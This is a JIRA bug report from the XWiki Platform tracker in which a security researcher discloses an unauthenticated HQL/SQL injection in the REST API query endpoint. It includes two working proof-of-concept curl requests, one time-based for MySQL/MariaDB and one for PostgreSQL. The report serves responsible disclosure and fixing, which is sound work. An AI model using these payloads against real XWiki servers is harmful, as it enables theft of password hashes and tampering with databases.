Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-22691

SQL injection in query endpoint of REST API

    XMLWordPrintable

Details

    • Unknown
    • N/A

    Description

      Hello,

      I am Sergey Anufrienko from Kaspersky ICS-CERT vulnerability research team.

      Recently I've discovered a HQL/SQL injection vulnerability in XWiki REST API /query endpoint (initially discovered in 15.10.5, later verified to be present in current latest versions 16.9.0/15.10.14). The vulnerability is present regardless of the used database backend (verified on MySQL/MariaDB/PostgreSQL).

      It is possible for a remote unauthenticated user to escape from the HQL execution context and perform a blind SQL injection to execute arbitrary SQL statements on the database backend, including when "Prevent unregistered users from viewing pages, regardless of the page rights" and "Prevent unregistered users from editing pages, regardless of the page rights" options are enabled.

      Depending on the used database backend, the attacker may be able to not only obtain confidential information such as password hashes from the database, but also execute UPDATE/INSERT/DELETE queries.

      I believe the vulnerability may be described by the following CVSSv3 vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:F/RL:X/RC:X with a score of 9.7 and corresponds to CWE-564: SQL Injection: Hibernate.

      The vulnerability may be tested in a default installtion of XWIki Standard Flavor, including using the official Docker containers.

      Example query, which leads to SQL injection with MySQL/MariaDB backend is shown below:

      time curl 'http://127.0.0.1:8080/rest/wikis/xwiki/query?q=where%20doc.name=length(\'a\')*org.apache.logging.log4j.ut
      il.Chars.SPACE%20or%201%3C%3E%271%5C%27%27%20union%20select%201,2,3,sleep(1)%20%23%27&type=hql&distinct=0'

      When executed, the response from the server will come after a delay of exactly one second, indicating successful execution of the injected SQL statement.

      An example of a query for the PostgreSQL database backend is shown below:

      curl "https://127.0.0.1:8080/rest/wikis/xwiki/query?q=where%20%24%24='%24%24=concat(%20chr(%2061%20),(chr(%2039%20))%20)%20;select%201%20--%20comment'&type=hql&distinct=0"

      Both requests employ database backend dependent techniques of breaking out of HQL query context, described, for example, here: https://www.sonarsource.com/blog/exploiting-hibernate-injections 

      Let me know if you need any further assistance.

      Thank you!

      Attachments

        Issue Links

          is caused by

          Improvement - An improvement or enhancement to an existing feature or task. XWIKI-3306 Add search resources to REST API

          • Major - Major loss of function.
          • Closed
          relates to

          Bug - A problem which impairs or prevents the functions of the product. XWIKI-22718 SQL injection in short form select requests through the script query API

          • Critical - Crashes, loss of data, severe memory leak.
          • Closed

          Activity

            People

              tmortagne Thomas Mortagne
              madprogrammer Sergey Anufrienko
              Votes:
              0 Vote for this issue
              Watchers:
              0 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: